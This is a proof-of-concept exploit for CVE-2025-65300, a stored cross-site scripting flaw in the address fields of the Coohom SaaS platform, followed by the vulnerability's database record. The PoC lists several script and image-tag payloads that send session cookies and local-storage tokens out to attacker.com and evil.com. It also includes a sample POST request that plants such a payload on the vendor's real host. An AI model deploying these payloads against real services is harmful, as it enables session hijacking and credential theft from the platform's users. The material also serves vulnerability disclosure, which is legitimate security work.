CVE-2025-65300

// CVE-2025-65300 PoC - Stored XSS in Coohom SaaS Platform // Target: Account Settings -> Address Fields (City, State, Country/Region) // Step 1: Login to Coohom SaaS Platform with low-privilege account // Navigate to Account Settings page // Step 2: Inject XSS payload in City field const xssPayloadCity = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'; // Or use shorter payload const xssPayloadAlt = '<img src=x onerror="fetch('https://attacker.com/steal?data='+btoa(document.cookie))">'; // Step 3: Similar payloads for State and Country/Region fields // City: <script>alert(document.domain)</script> // State: <img src=x onerror=document.location='https://evil.com/?c='+document.cookie> // Country/Region: <svg/onload=fetch('https://attacker.com/'+localStorage.getItem('token'))> // Step 4: Save the settings - payload is stored on server // Step 5: When any user views the profile, XSS executes // Example HTTP Request: /* POST /api/user/profile HTTP/1.1 Host: www.coohom.com Content-Type: application/json { "address": { "city": "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>", "state": "TestState", "country": "China" } } */

{"cve": {"id": "CVE-2025-65300", "sourceIdentifier": "[email protected]", "published": "2025-12-09T19:15:49.410", "lastModified": "2025-12-16T19:57:18.740", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability exists in the Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) in the Account Settings module, where unsanitized user input in Address fields (City, State, Country/Region) is rendered back to the page. Attackers can inject arbitrary JavaScript code, which executes when the affected profile page is viewed. This can lead to session hijacking, cookie theft, or arbitrary script execution in the victim's browser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:coohom:coohom:2025-10-28:*:*:*:*:*:*:*", "matchCriteriaId": "8FD9CC2A-BFEF-44C0-8943-6A8B6C11701F"}]}]}], "references": [{"url": "https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.coohom.com/pub/saas/settings/account", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}